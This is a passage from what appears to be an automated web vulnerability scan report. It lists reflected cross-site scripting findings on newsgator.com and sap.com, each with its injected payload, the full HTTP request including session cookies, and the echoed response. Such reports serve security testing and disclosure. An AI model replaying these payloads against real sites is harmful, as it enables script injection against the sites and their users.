Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:12 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
-------------------------*/

/*--- Tooltip Styles ---*/
/*                            */        .tool_671-tip {float: left; border:3px solid #9AC2DB !important; padding: 5px; background: #FFFFFF !important; max-width: 200d0f9a<script>alert(1)</script>5291c05a6e9px;}
/*                            */        .tool_671-title {color:#666666 !important;font-family:Arial, Verdana, sans-serif !important;font-size:12px !important; font-weight: bold;padding: 0; margin: 0; margin-top: -15px; pad
...[SNIP]...
3.71. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 4cbfd<script>alert(1)</script>1a6c591f3ee was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=1804cbfd<script>alert(1)</script>1a6c591f3ee&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:02 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7937
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:1804cbfd<script>alert(1)</script>1a6c591f3eepx;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_671 {width:1804cbfd<script>
...[SNIP]...
3.72. http://www.sap.com/about-sap/company/legal/privacy.epx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/company/legal/privacy.epx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6627b"><script>alert(1)</script>0b3746ad6a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b"><script>alert(1)</script>0b3746ad6a6=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:52 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:52 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:04:52 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:05:12 GMT
Content-Length: 22166


<html>
   <head>
       <title>SAP - SAP Privacy Statement</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" co
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kntbzmuk9zu=1&6627b"><script>alert(1)</script>0b3746ad6a6=1" />
...[SNIP]...
3.73. http://www.sap.com/global/js/addthis_widget.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/addthis_widget.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb837'%3b4803d0e7d8 was submitted in the REST URL parameter 1. This input was echoed as cb837';4803d0e7d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalcb837'%3b4803d0e7d8/js/addthis_widget.js?_=1318688503713 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, application/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33243
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:22:32 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:22:32 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:22:31 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalcb837';4803d0e7d8';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.74. http://www.sap.com/global/swf/Flash_Header_V2.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/swf/Flash_Header_V2.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a3e9'%3b52bfc88d5b0 was submitted in the REST URL parameter 1. This input was echoed as 9a3e9';52bfc88d5b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global9a3e9'%3b52bfc88d5b0/swf/Flash_Header_V2.swf HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34019
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:27:10 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:27:10 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:27:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global9a3e9';52bfc88d5b0';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.75. http://www.sap.com/global/ui/fonts/bensbk-webfont.ttf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/fonts/bensbk-webfont.ttf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e035'%3b9a389115ce5 was submitted in the REST URL parameter 1. This input was echoed as 9e035';9a389115ce5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global9e035'%3b9a389115ce5/ui/fonts/bensbk-webfont.ttf HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/global/ui/css/sapcom.css
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33521
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:22:08 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:22:08 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:22:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global9e035';9a389115ce5';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.76. http://www.sap.com/global/ui/js/common.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/common.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76071'%3b8141102f30b was submitted in the REST URL parameter 1. This input was echoed as 76071';8141102f30b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global76071'%3b8141102f30b/ui/js/common.js?r=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688530|session#1318688461599-607633#1318690330; SelectedCountryUrl=/index.epx

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33176
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:22:00 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:22:00 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:21:59 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global76071';8141102f30b';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.77. http://www.sap.com/global/ui/js/head.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/head.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db64f'%3b76e111cc207 was submitted in the REST URL parameter 1. This input was echoed as db64f';76e111cc207 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globaldb64f'%3b76e111cc207/ui/js/head.js?r=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33152
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:21:21 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:21:21 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:21:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globaldb64f';76e111cc207';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.78. http://www.sap.com/gwtservice.epx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /gwtservice.epx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f647'%3bc388078568b was submitted in the REST URL parameter 1. This input was echoed as 4f647';c388078568b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gwtservice.epx4f647'%3bc388078568b?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http://www.sapbusinessoptimizer.com/&campaigncode=CRM-US10-SGE-FRBUSOPT HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34382
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:28 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:28 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:28 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='gwtservice.epx4f647';c388078568b?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http:';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...
3.79. http://www.sap.com/gwtservices/httpBridge.epx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /gwtservices/httpBridge.epx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 597d9'%3bc31b6b8d8f4 was submitted in the REST URL parameter 1. This input was echoed as 597d9';c31b6b8d8f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gwtservices597d9'%3bc31b6b8d8f4/httpBridge.epx?kNtBzmUK9zU=1&action=registrationLayer&refresh=false&redirect=https%3A%2F%2Fwww.sap.com%2Fprofile%2Flogin.epx%3Fpmelayer%3Dtrue%26kNtBzmUK9zU%3D1&dialog=http://www.sap.com/common/formAbandonWarning.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; 